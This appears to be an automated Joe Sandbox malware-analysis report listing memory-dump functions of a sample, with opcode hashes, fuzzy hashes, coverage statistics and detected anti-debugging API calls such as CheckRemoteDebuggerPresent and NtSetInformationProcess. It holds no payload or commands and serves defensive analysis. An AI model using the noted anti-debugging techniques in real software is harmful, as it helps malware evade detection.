                            • Source File: 00000000.00000002.1860621287.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffd9ba10000_ubes6SC7Vd.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 075a216212ac9b680caa8667733819a88c67d6b02d878a873e266fc72df63e2a
                            • Instruction ID: 04df95ad1241743bf63079bb85ce764bc2a59b7dcba032cf7026e8ce072c97fc
                            • Opcode Fuzzy Hash: 075a216212ac9b680caa8667733819a88c67d6b02d878a873e266fc72df63e2a
                            • Instruction Fuzzy Hash: C4413221A0E68D0FE391DBB89878AE87BE0EF55220F1405FED099CB0A3CD5C2406C301
                            Function 00007FFD9BA16C37 Relevance: .1, Instructions: 129COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1860621287.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffd9ba10000_ubes6SC7Vd.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5431227b739f9720e94dae657c3978e9b0e79e2347c67e0dcc9281de8a90116e
                            • Instruction ID: 6180e9ea5189a1922c737c377e41ec50fa4ad03402f033879a5390fc96a27063
                            • Opcode Fuzzy Hash: 5431227b739f9720e94dae657c3978e9b0e79e2347c67e0dcc9281de8a90116e
                            • Instruction Fuzzy Hash: 1F418171E0AA1D8FDBA5DF588464BE8B7F1EF15300F5510B9C05EE72A1CA786A85CB00
                            Function 00007FFD9BA10638 Relevance: .1, Instructions: 119COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1860621287.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffd9ba10000_ubes6SC7Vd.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8fc11d4fef62a9dad711272c56a099ecae0fcae23420b9d52a2c323263d6148c
                            • Instruction ID: d6fb5f33d074884202cf829154ab3bd0cf6c8a3e39cdcbba84a644f0d4d7ff45
                            • Opcode Fuzzy Hash: 8fc11d4fef62a9dad711272c56a099ecae0fcae23420b9d52a2c323263d6148c
                            • Instruction Fuzzy Hash: D7415E70A0994C9FDF90EBACD859BADBBF1FF59310F4501AAD049EB261CB75A841CB40
                            Function 00007FFD9BA10640 Relevance: .1, Instructions: 110COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1860621287.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffd9ba10000_ubes6SC7Vd.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: da551bc0d23893569242c90e9fd5edacbbd1c38a0a15dbb24f23a6f0de2f71b5
                            • Instruction ID: 6b606c7ca63091c1573477d2fe17f4a66c448ccf88f797b3ae2a2204ab3cae39
                            • Opcode Fuzzy Hash: da551bc0d23893569242c90e9fd5edacbbd1c38a0a15dbb24f23a6f0de2f71b5
                            • Instruction Fuzzy Hash: 37318D30E0991D8FDBA4EB98D865AFDB7F1FF59310F04153AE01DE3291CA74A8418780
                            Function 00007FFD9BA1077D Relevance: .1, Instructions: 105COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1860621287.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffd9ba10000_ubes6SC7Vd.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 84c50bed6ea6a6d3306333a131f8a76ab65de47e0cfee8522c6d103077dc47eb
                            • Instruction ID: 8a9fd437edccaf3423a0c235012eb11fb8fb39d4966ef2630be787c71dce4ac8
                            • Opcode Fuzzy Hash: 84c50bed6ea6a6d3306333a131f8a76ab65de47e0cfee8522c6d103077dc47eb
                            • Instruction Fuzzy Hash: 1531AA12B0F2DA5AE363777C68B15D53B60EF52618B0F41F3D0D98D0E7ED09154A839A
                            Function 00007FFD9BA11710 Relevance: .1, Instructions: 91COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1860621287.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffd9ba10000_ubes6SC7Vd.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1c3b7c263124f9e953e0b0a446b6035b085872ff73808ae9a8596bc7ab8d2184
                            • Instruction ID: 3a348d27adad51ac04c33d46f01ee4edc2a2572a3e9e320952ee92a3a1f5a07a
                            • Opcode Fuzzy Hash: 1c3b7c263124f9e953e0b0a446b6035b085872ff73808ae9a8596bc7ab8d2184
                            • Instruction Fuzzy Hash: 5B316F71A0A65E8FDB94DF64C8A4AF977F1FF25301F1544BAC00EA31E2CA795585CB40
                            Function 00007FFD9BA107A8 Relevance: .1, Instructions: 89COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1860621287.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffd9ba10000_ubes6SC7Vd.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6a211ada02a8ac3fd03a550277a52ebff33d3bc547b127b66e612d1f10700577
                            • Instruction ID: 200b42e581c83a1c99023494ab05621c1eb32272307fee6d587bb0d5a2437327
                            • Opcode Fuzzy Hash: 6a211ada02a8ac3fd03a550277a52ebff33d3bc547b127b66e612d1f10700577
                            • Instruction Fuzzy Hash: C221CC12B0E6DB4AF37377AC64F19E53B60EF12618F0E51F3D0DA490E7AC0A194A8295
                            Function 00007FFD9BA1705E Relevance: .1, Instructions: 88COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1860621287.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffd9ba10000_ubes6SC7Vd.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 03d86a6b85c42df1380b238e2a43b7bae8f1a2d3bec1de3f610f0282f66e2015
                            • Instruction ID: b5252dade434c2808399cff5eaffd7be2c46486f1a2a53f40a79822d72c2621d
                            • Opcode Fuzzy Hash: 03d86a6b85c42df1380b238e2a43b7bae8f1a2d3bec1de3f610f0282f66e2015
                            • Instruction Fuzzy Hash: E321DC30B0551D9FEBA5EB28D861BE9B3B2EF4A305F4110F8D00DD3295CE75AD818B01
                            Function 00007FFD9BA171B9 Relevance: .1, Instructions: 85COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1860621287.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffd9ba10000_ubes6SC7Vd.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e86ce33c0a7774cde7c159fd3eb19afda2b6ff6a61f00e9b6fad1f7a31b7d7bb
                            • Instruction ID: 3dacdb07a8aa5a6ac0afc5d20dbff1cae01fba5c00bca8460beae5b87d5bc842
                            • Opcode Fuzzy Hash: e86ce33c0a7774cde7c159fd3eb19afda2b6ff6a61f00e9b6fad1f7a31b7d7bb
                            • Instruction Fuzzy Hash: 4321073188F3C94FD3635BA08C246D13FA5EF87214F0A01EAE0D9CB0A3C66D5A5AC761
                            Function 00007FFD9BA16A70 Relevance: .1, Instructions: 75COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1860621287.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffd9ba10000_ubes6SC7Vd.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: aea2c6a572c3b67015ae4513a78af6c6ccf6014b1a8b0906a2ef6c16047793d0
                            • Instruction ID: 7881ce0dbe6ddee290ab9ccfe002749010da2193f44b746ee6a21ced7c46e8f6
                            • Opcode Fuzzy Hash: aea2c6a572c3b67015ae4513a78af6c6ccf6014b1a8b0906a2ef6c16047793d0
                            • Instruction Fuzzy Hash: 89216D31E0A61D8FEBA5EB68D8647E87BB1FF49311F0500AAD019D71A1DB786A85CB01
                            Function 00007FFD9BA11105 Relevance: .1, Instructions: 63COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1860621287.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffd9ba10000_ubes6SC7Vd.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d58427a22da1613b0597271a1b541892b116954876a44c4cfa433a5de4d05c69
                            • Instruction ID: 63984e14103153c0fe864c28554e2b26d74d09292ea095b3ee8c9a78f44a14a1
                            • Opcode Fuzzy Hash: d58427a22da1613b0597271a1b541892b116954876a44c4cfa433a5de4d05c69
                            • Instruction Fuzzy Hash: 4911082094D68E0FE346AB7458695F97FF0DF46210F0504FBD469CB0E7CA6C5546C341
                            Function 00007FFD9BA116F6 Relevance: .1, Instructions: 63COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1860621287.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffd9ba10000_ubes6SC7Vd.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: cd98a7773dd8703d66f6bca37358ac1b5de39060269c6f8d49dbe2fef24889d5
                            • Instruction ID: eddebb75ae0109a0f6a86d411f2fd58662adf85a02cd1a9c00a9251e9287c004
                            • Opcode Fuzzy Hash: cd98a7773dd8703d66f6bca37358ac1b5de39060269c6f8d49dbe2fef24889d5
                            • Instruction Fuzzy Hash: C111C370A0A65E4FD7A8DF6884A46FAB7B0FF19320F105BB9C06DD72A2C9785541CB00
                            Function 00007FFD9BA17202 Relevance: .1, Instructions: 60COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1860621287.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffd9ba10000_ubes6SC7Vd.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 47b569a521c2b0933896f653f6e8a8bf182e8634b415ff584d7904fc41d04561
                            • Instruction ID: 16aec69418e6afe98a9870f376158de74425848e8d99b29ff0f4ec6d0a55388a
                            • Opcode Fuzzy Hash: 47b569a521c2b0933896f653f6e8a8bf182e8634b415ff584d7904fc41d04561
                            • Instruction Fuzzy Hash: CE118B2188F3C65FD3535BB08C259D27FA49F87214B0E01EAE0D5CB0A3C59E4A5BC762
                            Function 00007FFD9BA10838 Relevance: .1, Instructions: 54COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1860621287.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffd9ba10000_ubes6SC7Vd.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e0e210ad8e8c9f39870f0ae67c350f5baa4ae3648175667520506edeb05d8bf4
                            • Instruction ID: 5cef8646c09f095ab157c6811f8342f23498cd079e5360142b744ed060d1ba41
                            • Opcode Fuzzy Hash: e0e210ad8e8c9f39870f0ae67c350f5baa4ae3648175667520506edeb05d8bf4
                            • Instruction Fuzzy Hash: 57019212A0E6CA5AE36377A864B14E53F70EF03608F0A51F7D4DA890E7AD4A19498256
                            Function 00007FFD9BA1727D Relevance: .0, Instructions: 50COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1860621287.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffd9ba10000_ubes6SC7Vd.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e159c1a20824e2c728f9b8364af22f3f6620b7e1c365a429627ca2368d3049b0
                            • Instruction ID: 5728fc0a8dfe0ce41a23e2c296e11ff367684355bbf70b888caaf6f64eeb477f
                            • Opcode Fuzzy Hash: e159c1a20824e2c728f9b8364af22f3f6620b7e1c365a429627ca2368d3049b0
                            • Instruction Fuzzy Hash: 6711A16080A68C4FD752EBB8D869BD9BFE0EF16310F4500EED046DB1B2DB6C5445C702
                            Function 00007FFD9BA16996 Relevance: .0, Instructions: 49COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1860621287.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffd9ba10000_ubes6SC7Vd.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0989a7c672119b3f8fb0502c53941f720da4024f9a7405de6acb9802ebfdd5f9
                            • Instruction ID: 3dd5896425358517d747954c91b37f828cf813cd630b4ccefcea03561d2c4d0f
                            • Opcode Fuzzy Hash: 0989a7c672119b3f8fb0502c53941f720da4024f9a7405de6acb9802ebfdd5f9
                            • Instruction Fuzzy Hash: 06012B3194E7CE1FD752AB7888795E97FF0EF16250F0A00E6E4AAC70A3DD991946C311
                            Function 00007FFD9BA111A1 Relevance: .0, Instructions: 47COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1860621287.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffd9ba10000_ubes6SC7Vd.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ad1bcec9842a7992df10dbb1af399d5312cd49253ea35117fa8a65d785decb3e
                            • Instruction ID: 5f742864cd8a7cf52e30aca8cbf5b3becb8d4bdcf569385c0f457f8d1f62a4d0
                            • Opcode Fuzzy Hash: ad1bcec9842a7992df10dbb1af399d5312cd49253ea35117fa8a65d785decb3e
                            • Instruction Fuzzy Hash: 7001F931D0E68E4FE795EBA488695F97FA0EF55300F4504FAD869C70A2DE285544C701
                            Function 00007FFD9BA10B09 Relevance: .0, Instructions: 45COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1860621287.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffd9ba10000_ubes6SC7Vd.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9b829a5d2ce73f69f7c8813b69697d1e08ee942a083fb6a978707b63188e0c8c
                            • Instruction ID: 4378c10d55725f6d2f16113261e0dc024ec6ccacaee4f4a181eed28e334c6e29
                            • Opcode Fuzzy Hash: 9b829a5d2ce73f69f7c8813b69697d1e08ee942a083fb6a978707b63188e0c8c
                            • Instruction Fuzzy Hash: 8D01DF31E0E64D8FDB92ABA4C8256EE7BB1FF55301F0100BBD009E61E2DE382644C751
                            Function 00007FFD9BA16AC4 Relevance: .0, Instructions: 43COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1860621287.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffd9ba10000_ubes6SC7Vd.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1f2a80014dac3b9d3eb83783e185a890edaeec540a5a666e7f9925eb9600fd78
                            • Instruction ID: 2ee674542df62456c0a7e2fe42b9d7a5904572ef7b289c797e77c03a4280bd5b
                            • Opcode Fuzzy Hash: 1f2a80014dac3b9d3eb83783e185a890edaeec540a5a666e7f9925eb9600fd78
                            • Instruction Fuzzy Hash: 4901C871E056188FEB94DB58D8A5BE87BB1FF58301F0400EAD05AD72A1DA786A85CF01
                            Function 00007FFD9BA10858 Relevance: .0, Instructions: 40COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1860621287.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffd9ba10000_ubes6SC7Vd.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bf88537d4b2b9ab2a41dd2ff7ed6c22cd49e233bd4164955ee48243cdd3320de
                            • Instruction ID: 1220d5dc2fa62eeba0895382c5299056ec5362676cba9ddd3b3d4fe1bf4f0eb1
                            • Opcode Fuzzy Hash: bf88537d4b2b9ab2a41dd2ff7ed6c22cd49e233bd4164955ee48243cdd3320de
                            • Instruction Fuzzy Hash: 1AF08C12A0E7CD4EE76323A818B10E43F60EF03104F0A11F7D0D98A0E398595A498296
                            Function 00007FFD9BA10AA1 Relevance: .0, Instructions: 38COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1860621287.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffd9ba10000_ubes6SC7Vd.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8edb2084d7acefd27ac83791b9a0fb48fe9a3751335f21b4a1527f6e5019135c
                            • Instruction ID: 7728b7c0778d86a9afb5bf0e6f6c893457ef9fe88197b3e7018420dcd2d15216
                            • Opcode Fuzzy Hash: 8edb2084d7acefd27ac83791b9a0fb48fe9a3751335f21b4a1527f6e5019135c
                            • Instruction Fuzzy Hash: 65F0F63194D78E4FD352EBB448696E97FA0EF55310F4904EAD4A9CB0E3EA691594C302
                            Function 00007FFD9BA16E03 Relevance: .0, Instructions: 30COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1860621287.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffd9ba10000_ubes6SC7Vd.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 202de2c2868f0f444ce05466567b30b3302dd3482b8f78976be3b70502c047b4
                            • Instruction ID: 7eabd5ba780c8a72ad06c3b5e0918b1fb518dc456fee15e69cc4ba6c111c0ed9
                            • Opcode Fuzzy Hash: 202de2c2868f0f444ce05466567b30b3302dd3482b8f78976be3b70502c047b4
                            • Instruction Fuzzy Hash: 21F06D70D0999D4FDBE4DB688896BD9B7F1EF58300F0480E9814CD7251DA745EC18B80
                            Function 00007FFD9BA16DAE Relevance: .0, Instructions: 28COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1860621287.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffd9ba10000_ubes6SC7Vd.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7624f546e68dbad6aff547e0bbf78269f9e1b40b0d725c512a9e978785545d5f
                            • Instruction ID: 308c3326a285cd0b85e6e1f51c6e9f69bc0f766d8c2481643a729a6dec0c896d
                            • Opcode Fuzzy Hash: 7624f546e68dbad6aff547e0bbf78269f9e1b40b0d725c512a9e978785545d5f
                            • Instruction Fuzzy Hash: FEF0F870A0895D8FDB91EB288864BE8BBF4FF19300F0404E5D44DE7162DA3499C2CB00

                            Execution Graph

                            Execution Coverage:13%
                            Dynamic/Decrypted Code Coverage:100%
                            Signature Coverage:75%
                            Total number of Nodes:12
                            Total number of Limit Nodes:0

                            Executed Functions

                            Function 00007FFD9BA17B31 Relevance: 1.7, APIs: 1, Instructions: 188nativeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.2307759075.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_7ffd9ba10000_svrreve.jbxd
                            Similarity
                            • API ID: InformationProcess
                            • String ID:
                            • API String ID: 1801817001-0
                            • Opcode ID: 0f1710ee027cdeef47de3b3ce8c24f2f576527356f2045980aa7480215239744
                            • Instruction ID: f3d9a47862966f786199c967ecf746493cf3a1c4241539351dd0dae14f953828
                            • Opcode Fuzzy Hash: 0f1710ee027cdeef47de3b3ce8c24f2f576527356f2045980aa7480215239744
                            • Instruction Fuzzy Hash: 7D51487091874C8FDB58EF98C895AEDBBF1FB59310F1052AED04AE3251DB71A981CB81
                            Function 00007FFD9BA11322 Relevance: 1.7, APIs: 1, Instructions: 173nativeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 8 7ffd9ba11322-7ffd9ba17c76 NtSetInformationProcess 12 7ffd9ba17c7e-7ffd9ba17cce 8->12 13 7ffd9ba17c78 8->13 13->12
                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.2307759075.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_7ffd9ba10000_svrreve.jbxd
                            Similarity
                            • API ID: InformationProcess
                            • String ID:
                            • API String ID: 1801817001-0
                            • Opcode ID: f28b0fe7beeb974bc2f989d988dc63d8a579b55071f9cfb1286e840d6ac44309
                            • Instruction ID: 5f2f7cfec1873898710c5e6078fe374850b6d61d3b78a678b776ce741b055411
                            • Opcode Fuzzy Hash: f28b0fe7beeb974bc2f989d988dc63d8a579b55071f9cfb1286e840d6ac44309
                            • Instruction Fuzzy Hash: A0512870A1860C8FDF58EF98C895AEDBBF1FB59310F10516ED44AE3251DB70A981CB81
                            Function 00007FFD9BA179B5 Relevance: 1.7, APIs: 1, Instructions: 167COMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.2307759075.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_7ffd9ba10000_svrreve.jbxd
                            Similarity
                            • API ID: CheckDebuggerPresentRemote
                            • String ID:
                            • API String ID: 3662101638-0
                            • Opcode ID: d464e9f6b970fa42098d5d26cd0a648235060dc256fb3018061ec82a56522c13
                            • Instruction ID: 9663211b635d8cdaf577eb166909211364b8f61404df9ae392c31762f5e591de
                            • Opcode Fuzzy Hash: d464e9f6b970fa42098d5d26cd0a648235060dc256fb3018061ec82a56522c13
                            • Instruction Fuzzy Hash: D0515770D0864C8FDB94DFA8C889BEDBBF1EB5A311F1081AAD409E7252DB749985CF40
                            Function 00007FFD9BA11312 Relevance: 1.7, APIs: 1, Instructions: 156COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 25 7ffd9ba11312-7ffd9ba17ab8 CheckRemoteDebuggerPresent 29 7ffd9ba17ac0-7ffd9ba17b2c 25->29 30 7ffd9ba17aba 25->30 30->29
                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.2307759075.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_7ffd9ba10000_svrreve.jbxd
                            Similarity
                            • API ID: CheckDebuggerPresentRemote
                            • String ID:
                            • API String ID: 3662101638-0
                            • Opcode ID: 46baebea79960e9fc782e9ada58e9cd9755d4fd726d9303b31645bc46fd236f1
                            • Instruction ID: 92525084f5cb7076e01373750849afef4e838971682cdf52ee6e7bc960344326
                            • Opcode Fuzzy Hash: 46baebea79960e9fc782e9ada58e9cd9755d4fd726d9303b31645bc46fd236f1
                            • Instruction Fuzzy Hash: 1C512570D0861C8FEB94EF98C489BEDBBF1EB59311F10816AD409E7251DB74A985CF80

                            Executed Functions

                            Function 00007FFD9B9F0CB1 Relevance: .4, Instructions: 387COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000009.00000002.2302550158.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_7ffd9b9f0000_svrreve.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3f3482c616f0c336e03c537efbac7cd25b5577f2dadc60dadc4e888a5f283c78
                            • Instruction ID: 3d579bdc51d240c1087a66facf3f2bf534ebed46920848ebd75e84b74e7f5599
                            • Opcode Fuzzy Hash: 3f3482c616f0c336e03c537efbac7cd25b5577f2dadc60dadc4e888a5f283c78
                            • Instruction Fuzzy Hash: 7CD16670A09A4E8FDB46EF68C4646597FB1EF5E344B1600E9D049CF2ABCA36AC85C711
                            Function 00007FFD9B9F08B5 Relevance: .1, Instructions: 125COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000009.00000002.2302550158.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_7ffd9b9f0000_svrreve.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 96d93c3f042d823616eff3500fd2cb1a011184971fcb1847e8baffd56c16fa1a
                            • Instruction ID: 7c39de235bde2da637136312860acf4b6539dcc84e7608c0461edb97902b466e
                            • Opcode Fuzzy Hash: 96d93c3f042d823616eff3500fd2cb1a011184971fcb1847e8baffd56c16fa1a
                            • Instruction Fuzzy Hash: 1941BD71A19A4E8FEB45EF68C8649A87BB1FF49300B5201FAD049DB1E7CE252C49C751
                            Function 00007FFD9B9F1710 Relevance: .1, Instructions: 89COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000009.00000002.2302550158.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_7ffd9b9f0000_svrreve.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: cf73be882d2f957d79d285d730f794b930f5cf0adb52f8fa76822ebcba472f5d
                            • Instruction ID: ed58cf7981e5cd4e7e4fec883312211df3daae1d2dffc8efce1d0bf3f75743c4
                            • Opcode Fuzzy Hash: cf73be882d2f957d79d285d730f794b930f5cf0adb52f8fa76822ebcba472f5d
                            • Instruction Fuzzy Hash: 0D318D70A0A65E8FDB58DF64C8A4BF97BB1FF15314F1500BAD00AA71E2CA795A84CB40
                            Function 00007FFD9B9F07A8 Relevance: .1, Instructions: 86COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000009.00000002.2302550158.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_7ffd9b9f0000_svrreve.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 27cabb1cc80eea465d13c58f80d86eaf4a8f2532eec41cce02919876791dc430
                            • Instruction ID: 357ec9b72c9a7ae353cc42fdcb5f2eabb370da67e50c9f152e8ab4a488e88a03
                            • Opcode Fuzzy Hash: 27cabb1cc80eea465d13c58f80d86eaf4a8f2532eec41cce02919876791dc430
                            • Instruction Fuzzy Hash: 0A21A612B0E2DB5AE71777A864F14E53FA09F02628B0E41F2D4DE4D0E79C0B198A8295
                            Function 00007FFD9B9F1105 Relevance: .1, Instructions: 67COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000009.00000002.2302550158.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                            Joe Sandbox IDA Plugin
